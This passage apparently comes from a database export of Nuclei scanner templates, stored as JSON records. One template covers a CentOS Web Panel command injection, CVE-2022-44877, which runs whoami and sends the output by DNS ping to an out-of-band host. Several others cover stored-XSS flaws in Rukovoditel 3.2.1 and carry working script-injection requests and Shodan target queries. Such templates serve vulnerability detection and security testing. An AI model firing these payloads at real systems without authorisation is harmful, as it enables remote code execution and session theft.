\"text/html\")'\n - 'contains(body, \"{{md5(num)}}\")'\n condition: and\n# digest: 4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950", "hash": "040d8a76da30e611901ad35f81e7cb01", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c0" }, "name": "CVE-2022-44877.yaml", "content": "id: CVE-2022-44877\n\ninfo:\n name: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution\n author: For3stCo1d\n severity: critical\n description: |\n CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/_0xf4n9x_/status/1612068225046675457\n - https://github.com/numanturle/CVE-2022-44877\n - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44877\n - http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-44877\n cwe-id: CWE-78\n epss-score: 0.97427\n epss-percentile: 0.99935\n cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: control-webpanel\n product: webpanel\n shodan-query: http.title:\"Login | Control WebPanel\"\n tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel\n\nhttp:\n - raw:\n - |\n POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=root&password=toor&commit=Login\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Login Redirect.\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+'\n part: interactsh_request\n# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950", "hash": "d5b605ff9d4497a7b220898385606054", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c1" }, "name": "CVE-2022-44944.yaml", "content": "id: CVE-2022-44944\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/14\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44944\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44944\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950", "hash": "8556808059116e71251584d800874455", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c2" }, "name": "CVE-2022-44946.yaml", "content": "id: CVE-2022-44946\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/15\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44946\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44946\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.38539\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950", "hash": "cb5a9e7841fa98eaee7fe9a80e5f2f59", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c3" }, "name": "CVE-2022-44947.yaml", "content": "id: CVE-2022-44947\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/13\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44947\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44947\n cwe-id: CWE-79\n epss-score: 0.00109\n epss-percentile: 0.43483\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950", "hash": "c464a9de1f393dc6ed800f160331a8a1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c4" }, "name": "CVE-2022-44948.yaml", "content": "id: CVE-2022-44948\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/8\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44948\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44948\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.38514\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950", "hash": "225d6ce7f506ddf8967ddaa6dc172efc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c5" }, "name": "CVE-2022-44949.yaml", "content": "id: CVE-2022-44949\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/12\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44949\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44949\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"entities_id\"\n\n 24\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"forms_tabs_id\"\n\n 29\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"name\"\n\n test\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"short_name\"\n\n \n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"type\"\n\n fieldtype_input\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[width]\"\n\n input-small\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n 0\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"required_message\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access_template\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[5]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[4]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"notes\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - status_code_3 == 200\n - contains(content_type_3, \"text/html\")\n - contains(body_3, \"\")\n - contains(body_3, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950", "hash": "c0c824e1d7adf7c4ca887527c12e976b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c6" }, "name": "CVE-2022-44950.yaml", "content": "id: CVE-2022-44950\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/10\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44950\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44950\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"entities_id\"\n\n 24\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"forms_tabs_id\"\n\n 29\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"name\"\n\n \n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"short_name\"\n\n test\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"type\"\n\n fieldtype_input\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[width]\"\n\n input-small\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n 0\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"required_message\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access_template\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[5]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"access[4]\"\n\n yes\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf\n Content-Disposition: form-data; name=\"notes\"\n\n\n ------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: dsl\n dsl:\n - status_code_3 == 200\n - contains(content_type_3, \"text/html\")\n - contains(body_3, \"\")\n - contains(body_3, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950", "hash": "3e342cd6d95bdb3eab075b1e025cb2c2", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c7" }, "name": "CVE-2022-44951.yaml", "content": "id: CVE-2022-44951\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/11\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44951\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44951\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950", "hash": "21c58f271bc48c46e6e6bee8f1a0760b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c8" }, "name": "CVE-2022-44952.yaml", "content": "id: CVE-2022-44952\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/9\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44952\n - http://rukovoditel.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44952\n cwe-id: CWE-79\n epss-score: 0.07295\n epss-percentile: 0.93905\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"form_session_token\"\n\n {{nonce}}\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\n Test\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\n test\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n \n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\n english.php\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\n America/New_York\n 